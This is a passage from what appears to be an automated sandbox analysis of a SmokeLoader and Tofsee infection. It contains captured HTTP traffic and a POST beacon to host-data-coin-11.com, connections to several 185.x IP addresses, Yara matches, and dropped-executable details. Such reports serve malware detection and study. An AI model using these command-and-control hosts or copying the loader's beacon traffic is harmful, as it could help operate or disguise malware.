6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 00 53 87 1d f0 f3 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OTevSf#YJ0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 4f 0a ad 24 c4 d0 66 b1 78 06 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OTevO$fxP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 42 72 9e 57 c4 e0 66 e1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevBrWfdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 42 06 8e 51 de c4 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OTevBQf#YJ0
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sasldotps.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: host-data-coin-11.com
                      Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.5:49787 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49810 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49876 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49878 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49893 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49914 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49923 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49928 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49932 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49936 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 23.2.6B9B.exe.6415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.0.6B9B.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.0.6B9B.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.1.6B9B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.1.ttfssdi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.ttfssdi.6015a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.6B9B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.GNXG5XLBEH.exe.6d15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.1.GNXG5XLBEH.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.GNXG5XLBEH.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.ttfssdi.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.0.6B9B.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.375596550.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.375811349.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.354285300.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.303363186.0000000000470000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.354370443.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.288599943.00000000030E1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.303673269.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: GNXG5XLBEH.exe, 00000000.00000002.243273851.000000000072A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 45.2.svchost.exe.2ee0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.77CC.exe.2190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 45.2.svchost.exe.2ee0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.3.evjgtzc.exe.620000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.77CC.exe.2170e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.evjgtzc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.evjgtzc.exe.660000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.evjgtzc.exe.660000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.77CC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.77CC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.evjgtzc.exe.600e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.evjgtzc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002B.00000003.399149809.0000000000620000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.401571286.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.396801518.0000000002170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.402320315.0000000000660000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.395583768.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.552204136.0000000002EE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.371626952.0000000002190000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.402219986.0000000000600000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 77CC.exe PID: 5196, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: evjgtzc.exe PID: 4876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4020, type: MEMORYSTR

                      System Summary:

                      barindex
                      PE file has nameless sectionsShow sources
                      Source: 1523.exe.4.drStatic PE information: section name:
                      Source: 1523.exe.4.drStatic PE information: section name:
                      Source: 1523.exe.4.drStatic PE information: section name:
                      Source: 1523.exe.4.drStatic PE information: section name:
                      Source: 1523.exe.4.drStatic PE information: section name:
                      Source: 1523.exe.4.drStatic PE information: section name:
                      Source: 54D0.exe.4.drStatic PE information: section name:
                      Source: 54D0.exe.4.drStatic PE information: section name:
                      Source: 54D0.exe.4.drStatic PE information: section name:
                      Source: 54D0.exe.4.drStatic PE information: section name:
                      Source: 54D0.exe.4.drStatic PE information: section name:
                      Source: 54D0.exe.4.drStatic PE information: section name:
                      Source: 6471.exe.4.drStatic PE information: section name:
                      Source: 6471.exe.4.drStatic PE information: section name:
                      Source: 6471.exe.4.drStatic PE information: section name:
                      Source: 6471.exe.4.drStatic PE information: section name:
                      Source: 6471.exe.4.drStatic PE information: section name:
                      Source: 6471.exe.4.drStatic PE information: section name:
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6604 -ip 6604
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_004250C0
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0042B530
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0042A750
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_2_00402A5F
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_2_00402AB3
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_1_00402A5F
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 1_1_00402AB3
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_2_00402A5F
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_2_00402AB3
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_1_00402A5F
                      Source: C:\Users\user\AppData\Roaming\ttfssdiCode function: 19_1_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeCode function: 21_2_004027CA
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeCode function: 21_2_00401FF1
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeCode function: 21_2_0040158E
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeCode function: 21_2_004015A6
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeCode function: 21_2_004015BC
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeCode function: 21_2_00411065
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeCode function: 21_2_00412A02
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeCode function: 21_2_0040CAC5
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeCode function: 21_2_00410B21
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeCode function: 21_2_004115A9
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_0042A8F0
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_00425260
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_0042B6D0
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_006431FF
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_00643253
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_2_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_1_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_1_00402B2E
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00410800
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00411280
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_0041A14B
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_004103F0
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_004109F0
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_0042B310
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_0042A530
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_00424EA0
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                      Source: GNXG5XLBEH.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: GNXG5XLBEH.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: GNXG5XLBEH.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: GNXG5XLBEH.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2205.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2205.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2205.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2D8F.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D9EC.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D9EC.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D9EC.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 5BBC.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 5BBC.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 5BBC.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
